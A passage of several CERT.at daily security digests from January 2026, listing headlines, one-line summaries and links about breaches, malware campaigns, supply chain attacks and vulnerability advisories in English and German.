This bug highlights how deeply async_hooks has become embedded in the Node.js ecosystem. What started as a low-level debugging API is now a critical dependency for React Server Components, Next.js, every major APM tool, and any code using AsyncLocalStorage.
---------------------------------------------
https://nodejs.org/en/blog/vulnerability/january-2026-dos-mitigation-async-…
∗∗∗ F5: K000159546, Python vulnerability CVE-2024-5642 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000159546
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Montag 12-01-2026 18:00 − Dienstag 13-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Targets dev server offline after hackers claim to steal source code ∗∗∗
---------------------------------------------
Hackers are claiming to be selling internal source code belonging to Target Corporation, after publishing what appears to be a sample of stolen code repositories on a public software development platform. After BleepingComputer notified Target, the files were taken offline and the retailers developer Git server was inaccessible.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-a…
∗∗∗ CISA orders feds to patch Gogs RCE flaw exploited in zero-day attacks ∗∗∗
---------------------------------------------
CISA has ordered government agencies to secure their systems against a high-severity Gogs vulnerability that was exploited in zero-day attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-go…
∗∗∗ Facebook login thieves now using browser-in-browser trick ∗∗∗
---------------------------------------------
Hackers over the past six months have relied increasingly more on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-u…
∗∗∗ Convincing LinkedIn comment-reply tactic used in new phishing ∗∗∗
---------------------------------------------
Scammers are flooding LinkedIn posts with fake "reply" comments that appear to come from the platform, warning of bogus policy violations and urging users to click external links. Some even abuse LinkedIns official lnkd.in shortener, making the phishing attempts harder to spot.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-…
∗∗∗ What we know about Iran’s Internet shutdown ∗∗∗
---------------------------------------------
Cloudflare Radar data shows Internet traffic from Iran has effectively dropped to zero since January 8, signaling a complete shutdown in the country and disconnection from the global Internet.
---------------------------------------------
https://blog.cloudflare.com/iran-protests-internet-shutdown/
∗∗∗ GoBruteforcer Botnet Targets 50K-plus Linux Servers ∗∗∗
---------------------------------------------
Researchers detailed a souped-up version of the GoBruteforcer botnet that preys on servers with weak credentials and AI-generated configurations.
---------------------------------------------
https://www.darkreading.com/threat-intelligence/gobruteforcer-botnet-target…
∗∗∗ 10-Punkte-Papier: BDEW fordert Maßnahmen zum Schutz kritischer Infrastruktur ∗∗∗
---------------------------------------------
In einem Positionspapier fordert der Bundesverband der Energie- und Wasserwirtschaft die Stärkung der Resilienz kritischer Infrastrukturen.
---------------------------------------------
https://www.golem.de/news/10-punkte-papier-bdew-fordert-massnahmen-zum-schu…
∗∗∗ n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens ∗∗∗
---------------------------------------------
Threat actors have been observed uploading a set of eight packages on the npm registry that masqueraded as integrations targeting the n8n workflow automation platform to steal developers OAuth credentials.
---------------------------------------------
https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
∗∗∗ New Malware Campaign Delivers Remcos RAT Through Multi-Stage Windows Attack ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a new campaign dubbed SHADOW#REACTOR that employs an evasive multi-stage attack chain to deliver a commercially available remote administration tool called Remcos RAT and establish persistent, covert remote access.
---------------------------------------------
https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html
∗∗∗ New Advanced Linux VoidLink Malware Targets Cloud and container Environments ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a previously undocumented and feature-rich malware framework codenamed VoidLink thats specifically designed for long-term, stealthy access to Linux-based cloud environments.
---------------------------------------------
https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html
∗∗∗ Businesses in 2026: Maybe we should finally look into that AI security stuff ∗∗∗
---------------------------------------------
Survey finds security checks nearly doubled in a year as leaders wise up. The number of organizations that have implemented methods for identifying security risks in the AI tools they use has almost doubled in the space of a year.
---------------------------------------------
https://www.theregister.com/2026/01/12/ai_security_wef_survey/
∗∗∗ Mandiant open sources tool to prevent leaky Salesforce misconfigs ∗∗∗
---------------------------------------------
AuraInspector automates the most common abuses and generates fixes for customers Mandiant has released an open source tool to help Salesforce admins detect misconfigurations that could expose sensitive data.
---------------------------------------------
https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/
∗∗∗ Dutch cops cuff alleged AVCheck malware kingpin in Amsterdam ∗∗∗
---------------------------------------------
33-year-old was under surveillance for some time before returning home from the UAE Dutch police believe they have arrested a man behind the AVCheck online platform - a service used by cybercrims that Operation Endgame shuttered in May.
---------------------------------------------
https://www.theregister.com/2026/01/13/avcheck_arrest/
∗∗∗ Start der ersten ESC-Ticketwelle: Vorsicht vor unseriösen Angeboten! ∗∗∗
---------------------------------------------
Endlich ist es so weit: Der Vorverkauf für den Eurovision Song Contest 2026 hat begonnen! Doch Fans sollten besonders vorsichtig sein, denn unseriöse Anbieter versuchen, außerhalb der offiziellen Verkaufsplattformen Profit zu schlagen.
---------------------------------------------
https://www.watchlist-internet.at/news/start-der-ersten-esc-ticketwelle-vor…
∗∗∗ Neue Phishing-Welle: Ausstehende Zahlungen ans Finanzamt ∗∗∗
---------------------------------------------
Einmal mehr geben sich Kriminelle als das Bundesministerium für Finanzen aus. Aktuell nehmen sie sowohl Privatpersonen als auch Unternehmen ins Visier. In beiden Fällen sollen angeblich offene Zahlungen mit einer Überweisung beglichen werden – auf ein Konto im Ausland.
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-ausstehende-zahlungen-finan…
∗∗∗ Latin America Sees Sharpest Rise in Cyber Attacks in December 2025 as Ransomware Activity Accelerates ∗∗∗
---------------------------------------------
In December 2025, organizations experienced an average of 2,027 cyber attacks per organization per week. This represents a 1% month-over-month increase and a 9% year-over-year increase. While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year.
---------------------------------------------
https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cy…
∗∗∗ VoidLink: The Cloud-Native Malware Framework Weaponizing Linux Infrastructure ∗∗∗
---------------------------------------------
Key Points: VoidLink is a cloud-native Linux malware framework built to maintain long-term, stealthy access to cloud infrastructure rather than targeting individual endpoints. It reflects a shift in attacker focus away from Windows systems toward the Linux environments that power cloud services and critical operations. Its modular, plug-in-driven design allows threat actors to customize capabilities over time, expanding attacks quietly as objectives evolve.
---------------------------------------------
https://blog.checkpoint.com/research/voidlink-the-cloud-native-malware-fram…
∗∗∗ Sweden detains ex-military IT consultant suspected of spying for Russia ∗∗∗
---------------------------------------------
A 33-year-old former IT consultant for Sweden’s Armed Forces has been detained on suspicions of spying for Russian intelligence, Swedish prosecutors said.
---------------------------------------------
https://therecord.media/sweden-detains-it-consultant-russia
∗∗∗ 0patch Micropatch für CredSSP-Schwachstelle CVE-2025-47987 ∗∗∗
---------------------------------------------
Noch ein kleiner Nachtrag von letzter Woche und vor dem Januar 2026 Patchday. ACROS Security hat einen 0patch Micropatch für eine Elevation of Privilege (EoP)-Schwachstelle CVE-2025-47987 im Credential Security Support Provider Protocol (CredSSP) veröffentlicht.
---------------------------------------------
https://borncity.com/blog/2026/01/13/0patch-micropatch-fuer-credssp-schwach…
∗∗∗ End of Support für Microsoft-Produkte in 2026 ∗∗∗
---------------------------------------------
Das Jahr 2026 bringt für Nutzer von Microsoft Produkten einige Termine, an denen der Support endet. Das reicht von diversen Windows-Versionen, die dann nicht mehr durch Updates unterstützt werden, bis hin zu Microsoft Office 2021.
---------------------------------------------
https://borncity.com/blog/2026/01/13/end-of-support-fuer-microsoft-produkte…
∗∗∗ Russian BlueDelta (Fancy Bear) Uses PDFs to Steal Logins in Just 2 Seconds ∗∗∗
---------------------------------------------
New research from Recorded Future reveals how Russian state hackers (BlueDelta) are using fake Microsoft and Google login portals to steal credentials. The campaign involves using legitimate PDF lures from GRC and EcoClimate to trick victims.
---------------------------------------------
https://hackread.com/russian-bluedelta-fancy-bear-pdfs-steal-login/
∗∗∗ Widespread Magecart Campaign Targets Users of All Major Credit Cards ∗∗∗
---------------------------------------------
Researchers at Silent Push have exposed a global Magecart campaign stealing credit card data since 2022. Learn how this invisible web-skimming attack targets major networks like Mastercard and Amex, and how to stay safe.
---------------------------------------------
https://hackread.com/magecart-targets-all-credit-cards-users/
∗∗∗ K7 Antivirus: Named pipe abuse, registry manipulation and privilege escalation (CVE-2025-67826) ∗∗∗
---------------------------------------------
When hunting for privilege escalation vulnerabilities, named pipes are a goldmine. Antivirus products often use named pipes to allow unprivileged users to trigger privileged operations, making them especially promising targets for this class of vulnerability.
---------------------------------------------
http://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulati…
∗∗∗ How GitHub could secure npm ∗∗∗
---------------------------------------------
In 2025, npm experienced an unprecedented number of compromised packages in a series of coordinated attacks on the JavaScript open source supply chain. These packages ranged from crypto-stealing malware1 to credential-stealing exploits2. While GitHub announced changes3 to address these attacks, many maintainers (myself included) found the response insufficient.
---------------------------------------------
https://humanwhocodes.com/blog/2026/01/how-github-could-secure-npm/
∗∗∗ Shai Hulud 2.0 Campaign ∗∗∗
---------------------------------------------
Shai-Hulud 2.0 represents one of the most severe supply chain compromises observed in the modern cloud-native ecosystem.
The campaign involved the manipulation of hundreds of publicly available packages and specifically targeted developer workstations, CI/CD pipelines, and cloud workloads to harvest credentials and sensitive configuration data.
---------------------------------------------
https://detect.fyi/shai-hulud-2-0-campaign-be390e502f28?source=rss----d5fd8…
∗∗∗ Malicious Chrome Extension Steals MEXC API Keys for Account Takeover ∗∗∗
---------------------------------------------
Socket’s Threat Research Team identified a malicious Chrome extension, MEXC API Automator, published to the Chrome Web Store on September 1, 2025, by a threat actor under the alias jorjortan142.
---------------------------------------------
https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys?utm…
∗∗∗ Fixing ESC1 - Enrollee supplies subject and template allows client authentication ∗∗∗
---------------------------------------------
ADCS misconfigurations are one of the most common privilege escalation vectors we encounter. This article covers steps to remediate ESC1 flaws.
---------------------------------------------
https://projectblack.io/blog/fixing-esc1-enrollee-supplies-subject-and-temp…
∗∗∗ Lack of isolation in agentic browsers resurfaces old vulnerabilities ∗∗∗
---------------------------------------------
With browser-embedded AI agents, we’re essentially starting the security journey over again. We exploited a lack of isolation mechanisms in multiple agentic browsers to perform attacks ranging from the dissemination of false information to cross-site data leaks.
---------------------------------------------
https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browse…
=====================
= Vulnerabilities =
=====================
∗∗∗ Unauthenticated access to local configuration ∗∗∗
---------------------------------------------
CVSSv3 Score: 9.3. An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in FortiFone Web Portal page may allow an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-25-260
∗∗∗ Unauthenticated remote command injection ∗∗∗
---------------------------------------------
CVSSv3 Score: 9.4. An improper neutralization of special elements used in an OS command (OS Command Injection) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-25-772
∗∗∗ SAP Security Patch Day January 2026 ∗∗∗
---------------------------------------------
SAP has released its January 2026 security patch package containing 17 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes four HotNews vulnerabilities with CVSS ratings up to 9.9, four High priority issues, seven Medium priority fixes, and two Low priority updates. The patches affect SAP S/4HANA, SAP HANA database, SAP NetWeaver, SAP Wily Introscope, and various application components.
---------------------------------------------
https://redrays.io/blog/sap-security-patch-day-january-2026/
∗∗∗ TinyWeb: Windows-Web-Server ermöglicht Codeschmuggel ∗∗∗
---------------------------------------------
In dem schlanken Web-Server TinyWeb für Windows können Angreifer aus dem Netz beliebigen Code einschleusen. Ein Update hilft.
---------------------------------------------
https://www.heise.de/news/TinyWeb-Windows-Web-Server-ermoeglicht-Codeschmug…
∗∗∗ TYPO3-CORE-SA-2026-003: Broken Access Control in Recycler Module ∗∗∗
---------------------------------------------
It has been discovered that TYPO3 CMS is susceptible to broken access control.
---------------------------------------------
https://typo3.org/security/advisory/typo3-core-sa-2026-003
∗∗∗ ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation ∗∗∗
---------------------------------------------
ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user. The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0.
---------------------------------------------
https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.h…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (mariadb10.11, mariadb:10.11, mariadb:10.3, mariadb:10.5, and tar), Debian (net-snmp), Fedora (coturn, NetworkManager-l2tp, openssh, and tuxanci), Mageia (libtasn1), Oracle (buildah, cups, httpd, kernel, libpq, libsoup, libsoup3, mariadb:10.11, mariadb:10.3, openssl, and podman), SUSE (cpp-httplib, ImageMagick, libtasn1, python-cbor2, util-linux, valkey, and wget2), and Ubuntu (google-guest-agent, linux-iot, and python-urllib3).
---------------------------------------------
https://lwn.net/Articles/1053988/
∗∗∗ Remote Code Execution With Modern AI/ML Formats and Libraries ∗∗∗
---------------------------------------------
We identified remote code execution vulnerabilities in open-source AI/ML libraries published by Apple, Salesforce and NVIDIA.
---------------------------------------------
https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-librar…
∗∗∗ YoSmart YoLink Smart Hub ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-03
∗∗∗ Rockwell Automation FactoryTalk DataMosaix Private Cloud ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-02
∗∗∗ Rockwell Automation 432ES-IG3 Series A ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-01
∗∗∗ Security Vulnerabilities fixed in Firefox 147 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-01/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 09-01-2026 18:00 − Montag 12-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Max severity Ni8mare flaw impacts nearly 60,000 n8n instances ∗∗∗
---------------------------------------------
Nearly 60,000 n8n instances exposed online remain unpatched against a maximum-severity vulnerability dubbed "Ni8mare."
---------------------------------------------
https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-im…
∗∗∗ Spanish energy giant Endesa discloses data breach affecting customers ∗∗∗
---------------------------------------------
Spanish energy provider Endesa and its Energía XXI operator are notifying customers that hackers accessed the companys systems and accessed contract-related information, which includes personal details.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-…
∗∗∗ Hidden Telegram proxy links can reveal your IP address in one click ∗∗∗
---------------------------------------------
A single click on what may appear to be a Telegram username or harmless link is all it takes to expose your real IP address to attackers due to how proxy links are handled. Telegram says it will add warnings to proxy links after researchers demonstrated that such one-click interactions could reveal a Telegram users real IP address.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-…
∗∗∗ Illicit Crypto Economy Surges Amid Increased Nation-State Activity ∗∗∗
---------------------------------------------
Cybercriminal cryptocurrency transactions totaled billions in 2025, with activity from sanctioned countries like Russia and Iran causing the largest jump.
---------------------------------------------
https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation…
∗∗∗ Russia’s Fancy Bear APT Doubles Down on Global Secrets Theft ∗∗∗
---------------------------------------------
The notorious state-sponsored group relies on basic techniques that are highly effective, often delivering greater ROI than more complex malware-heavy operations.
---------------------------------------------
https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credenti…
∗∗∗ Two Separate Campaigns Target Exposed LLM Services ∗∗∗
---------------------------------------------
A total of 91,403 sessions targeted public LLM endpoints to find leaks in organizations use of AI and map an expanding attack surface.
---------------------------------------------
https://www.darkreading.com/endpoint-security/separate-campaigns-target-exp…
∗∗∗ Cybersecurity Act: EU-Kommission will hartes Verbot von Huawei ∗∗∗
---------------------------------------------
Bisher freiwillige Beschränkungen gegen chinesische Ausrüster will die EU-Kommission nun zwangsweise umsetzen. Das ist in der EU stark umstritten und erscheint aus der Zeit gefallen.
---------------------------------------------
https://www.golem.de/news/cybersecurity-act-eu-kommission-will-hartes-verbo…
∗∗∗ Lohnabrechnungen falsch verschickt: DSGVO-Vorfall bei der Datev ∗∗∗
---------------------------------------------
Nach einer technischen Störung bei der Datev-Lohnabrechnung sind Kundendaten in falsche Hände gelangt. Auslöser war ausgerechnet ein Problemlösungsversuch.
---------------------------------------------
https://www.golem.de/news/lohnabrechnungen-falsch-verschickt-dsgvo-vorfall-…
∗∗∗ Researchers Uncover Service Providers Fueling Industrial-Scale Pig Butchering Fraud ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on two service providers that supply online criminal networks with the necessary tools and infrastructure to fuel the pig butchering-as-a-service (PBaaS) economy.
---------------------------------------------
https://thehackernews.com/2026/01/researchers-uncover-service-providers.html
∗∗∗ GoBruteforcer Botnet Targets Crypto Project Databases by Exploiting Weak Credentials ∗∗∗
---------------------------------------------
A new wave of GoBruteforcer attacks has targeted databases of cryptocurrency and blockchain projects to co-opt them into a botnet thats capable of brute-forcing user passwords for services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux servers.
---------------------------------------------
https://thehackernews.com/2026/01/gobruteforcer-botnet-targets-crypto.html
∗∗∗ UK government exempting itself from flagship cyber law inspires little confidence ∗∗∗
---------------------------------------------
Ministers promise equivalent standards just without the legal obligation ANALYSIS From Mays cyberattack on the Legal Aid Agency to the Foreign Office breach months later, cyber incidents have become increasingly common in UK government.
---------------------------------------------
https://www.theregister.com/2026/01/10/csr_bill_analysis/
∗∗∗ Instagram-Datenleck: Daten von 6,2 Millionen Konten bei Have-I-Been-Pwned ∗∗∗
---------------------------------------------
Daten von 6,2 Millionen Instagram-Nutzern sind beim Have-I-Been-Pwned-Projekt gelandet.
---------------------------------------------
https://www.heise.de/news/Instagram-6-2-Millionen-Nutzerdaten-mittels-Scrap…
∗∗∗ ÖIAT-Schwerpunkterhebung deckt auf: Massive Präsenz von Abo-Fallen in Google-Anzeigen ∗∗∗
---------------------------------------------
Bei einer eingehenden Analyse der Google Werbebibliothek entdeckte das Österreichische Institut für angewandte Telekommunikation (ÖIAT) eine große Menge an gefährlichen Ads. Insgesamt waren es weit über 27.000 problematische Werbeanzeigen, die als Köder für Abo-Fallen dienten. Auf Beschwerden reagierte Google bisher nicht.
---------------------------------------------
https://www.watchlist-internet.at/news/schwerpunkterhebung-abo-fallen-googl…
∗∗∗ Basketball player arrested for alleged ransomware ties freed in Russia-France prisoner swap ∗∗∗
---------------------------------------------
Daniil Kasatkin, 26, was seen in a video shared by Russian state news outlet TASS emerging from a plane that was then used to send French researcher Laurent Vinatier back to France.
---------------------------------------------
https://therecord.media/france-frees-russian-basketball-player-ransomware-s…
∗∗∗ MC1215070: MFA für Microsoft 365 Admin Center ab Feb. 2026 Pflicht ∗∗∗
---------------------------------------------
Noch eine kurze Information für Administratoren von Microsoft 365-Tenants. Microsoft erzwingt aus Sicherheitsgründen ab dem 9. Februar 2026 eine Multifaktor-Authentifizierung (MFA) zur Administratoranmeldung am Microsoft 365 Admin Center. Ohne entsprechende Maßnahmen scheitert dann die Anmeldung.
---------------------------------------------
https://borncity.com/blog/2026/01/11/mc1215070-mfa-fuer-microsoft-365-admin…
∗∗∗ Database of 323,986 BreachForums Users Leaked as Admin Disputes Scope ∗∗∗
---------------------------------------------
Database of 323,986 BreachForums users leaked online as forum admins claim the exposed data is partial and dates back to August 2025.
---------------------------------------------
https://hackread.com/breachforums-database-users-leak-admin-disputes/
∗∗∗ Everest Ransomware Claims Breach at Nissan, Says 900GB of Data Stolen ∗∗∗
---------------------------------------------
Everest ransomware claims to have breached Nissan Motor Corporation, alleging the theft of 900GB of internal data, including documents and screenshots.
---------------------------------------------
https://hackread.com/everest-ransomware-nissan-data-breach/
∗∗∗ How Safe is the Rust Ecosystem? A Deep Dive into crates.io ∗∗∗
---------------------------------------------
The relentless wave of high-impact supply chain attacks throughout 2025—most notably the major incident within npm [..] —suggests this trend is far from peaking. In fact, with the rapid adoption of AI and LLMs in development workflows, we are likely facing an acceleration of these threats rather than a decline, in my opinion.
---------------------------------------------
https://mr-leshiy-blog.web.app/blog/crates_io_analysis/
∗∗∗ Detection of Kerberos Golden Ticket Attacks via Velociraptor ∗∗∗
---------------------------------------------
Kerberos is a strange technology. Over the years, I’ve gone through its internal workings again and again, yet parts of it always seem to slip away. It has been a while since I did my OSCP, so inevitably I’ve found myself back in this topic to refresh my knowledge.
---------------------------------------------
https://detect.fyi/detection-of-kerberos-golden-ticket-attacks-via-velocira…
=====================
= Vulnerabilities =
=====================
∗∗∗ Sicherheitsupdate: Dell-Laptops mit Adreno-GPU sind verwundbar ∗∗∗
---------------------------------------------
Der Treiber von Qualcomms Adreno GPU ist löchrig und gefährdet die Sicherheit verschiedener Dell-Laptops. Ein reparierter Treiber steht zum Download bereit.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdate-Dell-Laptops-mit-Adreno-GPU-sin…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium and sogo), Fedora (chromium, foomuuri, libpng, libsodium, mariadb10.11, musescore, nginx, python-pdfminer, python-urllib3, python3.12, seamonkey, wasmedge, and wget2), Mageia (curl, libpcap, sodium, wget2, and zlib), Slackware (lcms2), SUSE (chromedriver, chromium, noopenh264, coredns, curl, dcmtk, fontforge, gdk-pixbuf-loader-libheif, gimp, kernel, libheif, libpng16, libsoup-2_4-1, libvirt, mariadb, php8, poppler, python-filelock, python-tornado6, python311-aiohttp, qemu, sssd, and traefik), and Ubuntu (libheif, libtasn1-6, linux-azure-nvidia, linux-kvm, linux-raspi, linux-raspi-realtime, and php7.2, php7.4, php8.1, php8.3, php8.4).
---------------------------------------------
https://lwn.net/Articles/1053820/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 08-01-2026 18:00 − Freitag 09-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ VMware ESXi zero-days likely exploited a year before disclosure ∗∗∗
---------------------------------------------
Chinese-speaking threat actors used a compromised SonicWall VPN appliance to deliver a VMware ESXi exploit toolkit that seems to have been developed more than a year before the targeted vulnerabilities became publicly known.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/vmware-esxi-zero-days-likely…
∗∗∗ FBI warns about Kimsuky hackers using QR codes to phish U.S. orgs ∗∗∗
---------------------------------------------
The North Korean state-sponsored hacker group Kimsuki is using malicious QR codes in spearphishing campaigns that target U.S. organizations, the Federal Bureau of Investigation warns in a flash alert.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fbi-warns-about-kimsuky-hack…
∗∗∗ New China-linked hackers breach telcos using edge device exploits ∗∗∗
---------------------------------------------
A sophisticated threat actor that uses Linux-based malware to target telecommunications providers has recently broadened its operations to include organizations in Southeastern Europe.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-china-linked-hackers-bre…
∗∗∗ Defeating KASLR by Doing Nothing at All ∗∗∗
---------------------------------------------
I’ve recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.
---------------------------------------------
https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.…
∗∗∗ Google Sees Spam, You See Your Site: A Cloaked SEO Spam Attack ∗∗∗
---------------------------------------------
We recently handled a case where a customer reported strange SEO behavior on their website. Regular visitors saw a normal site. No popups. No redirects. No visible spam. However, when they checked their site on Google, the search results were flooded with eBay-type-looking websites and “Situs Toto” gambling spam. This is a professional-grade SEO cloaking attack.
---------------------------------------------
https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloake…
∗∗∗ Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations ∗∗∗
---------------------------------------------
Russian state-sponsored threat actors have been linked to a fresh set of credential harvesting attacks targeting individuals associated with a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan.
---------------------------------------------
https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.ht…
∗∗∗ Auslegungssache 150: Auf digitaler Spurensuche ∗∗∗
---------------------------------------------
Im ct-Datenschutz-Podcast erklärt eine IT-Forensikerin, wie sie nach Vorfällen Spuren sichert, mit Erpressern verhandelt und den Datenschutz im Blick behält.
---------------------------------------------
https://www.heise.de/hintergrund/Auslegungssache-150-Auf-digitaler-Spurensu…
∗∗∗ Von München bis Sevilla: Internationaler Schlag gegen Cyber-Mafia „Black Axe“ ∗∗∗
---------------------------------------------
Ermittlern gelang in Spanien ein empfindlicher Schlag gegen die als „Black Axe“ bekannte nigerianische Cyber-Mafia.
---------------------------------------------
https://www.heise.de/news/Von-Muenchen-bis-Sevilla-Internationaler-Schlag-g…
∗∗∗ Who Benefited from the Aisuru and Kimwolf Botnets? ∗∗∗
---------------------------------------------
Our first story of 2026 revealed how a destructive new botnet called Kimwolf rapidly grew to infect more than two million devices by mass-compromising a vast number of unofficial Android TV streaming boxes. Today, well dig through digital clues left behind by the hackers, network operators, and cybercrime services that appear to have benefitted from Kimwolfs spread.
---------------------------------------------
https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwo…
∗∗∗ CPPA fines data broker selling lists of Alzheimers patients ∗∗∗
---------------------------------------------
Datamasters bought and resold the names, addresses, phone numbers and email addresses of millions of people with Alzheimer’s disease, drug addiction, bladder incontinence and other medical conditions for targeted advertising, according to the CPPA.
---------------------------------------------
https://therecord.media/ccpa-fines-data-broker-selling-lists-alzheimers
∗∗∗ Russian Hacktivists hack CCTV Cameras in Denmark ∗∗∗
---------------------------------------------
The hacktivists had recorded part of the video stream from the CCTV as proof of the hack and published it. It was reported that no individuals were identifiable on the recording.
---------------------------------------------
https://www.truesec.com/hub/blog/russian-hacktivists-hack-cctv-cameras-in-d…
∗∗∗ CISCO-Switches gehen wegen DNS-Fehler in Boot-Schleifen ∗∗∗
---------------------------------------------
Weltweit kämpfen Administratoren wohl damit, dass bestimmte Switches des Herstellers CISCO in einer Neustart-Schleife (Boot-Loop) gefangen sind. Das tritt auf, nachdem die Geräte einen DNS-Client-Fehler protokolliert haben.
---------------------------------------------
https://borncity.com/blog/2026/01/09/cisco-switches-gehen-wegen-dns-fehler-…
∗∗∗ Hacker Behind Wired.com Leak Now Selling Full 40M Condé Nast Records ∗∗∗
---------------------------------------------
A hacker claims to be selling nearly 40 million Condé Nast user records after leaking Wired.com data, with multiple major brands allegedly affected.
---------------------------------------------
https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/
∗∗∗ Threat Actors Actively Targeting LLMs ∗∗∗
---------------------------------------------
Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments.
---------------------------------------------
https://www.greynoise.io/blog/threat-actors-actively-targeting-llms
∗∗∗ Do Smart People Ever Say They’re Smart? (SmarterTools SmarterMail Pre-Auth RCE CVE-2025-52691) ∗∗∗
---------------------------------------------
Welcome to 2026! While we are all waiting for the scheduled SSLVPN ITW exploitation programming that occurs every January, we’re back from Christmas and idle hands, idle minds, yada yada. In December, we were alerted to a vulnerability in SmarterTools’ SmarterMail solution, accompanied by an advisory from Singapore’s Cyber Security Agency (CSA) - CVE-2025-52691, a pre-auth RCE that obtained full marks (10/10) on the industry’s scale.
---------------------------------------------
https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertoo…
∗∗∗ Fake Windows Update and BSOD Alerts Used in a Tech Support Scam ∗∗∗
---------------------------------------------
While reviewing submissions received through the WordPress feedback form on my website, I came across a URL that initially appeared unremarkable. Such submissions are common and often contain benign questions or comments, but this particular link stood out enough to warrant closer inspection.
---------------------------------------------
https://malwr-analysis.com/2026/01/09/fake-windows-update-and-bsod-alerts-u…
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#361400: BeeS Software Solutions BeeS Examination Tool (BET) portal contains SQL injection vulnerability ∗∗∗
---------------------------------------------
The BeeS Examination Tool (BET) portal from BeeS Software Solutions contains an SQL injection vulnerability in its website login functionality. More than 100 universities use the BET portal for test administration and other academic tasks.
---------------------------------------------
https://kb.cert.org/vuls/id/361400
∗∗∗ RICOH Streamline NX vulnerable to improper authorization ∗∗∗
---------------------------------------------
RICOH Streamline NX provided by Ricoh Company, Ltd. contains an improper authorization vulnerability.
---------------------------------------------
https://jvn.jp/en/jp/JVN12770174/
∗∗∗ Trend Micro Apex Central RCE Flaw Scores 9.8 CVSS in On-Prem Windows Versions ∗∗∗
---------------------------------------------
Trend Micro has released security updates to address multiple security vulnerabilities impacting on-premise versions of Apex Central for Windows, including a critical bug that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-69258, carries a CVSS score of 9.8 out of a maximum of 10.0.
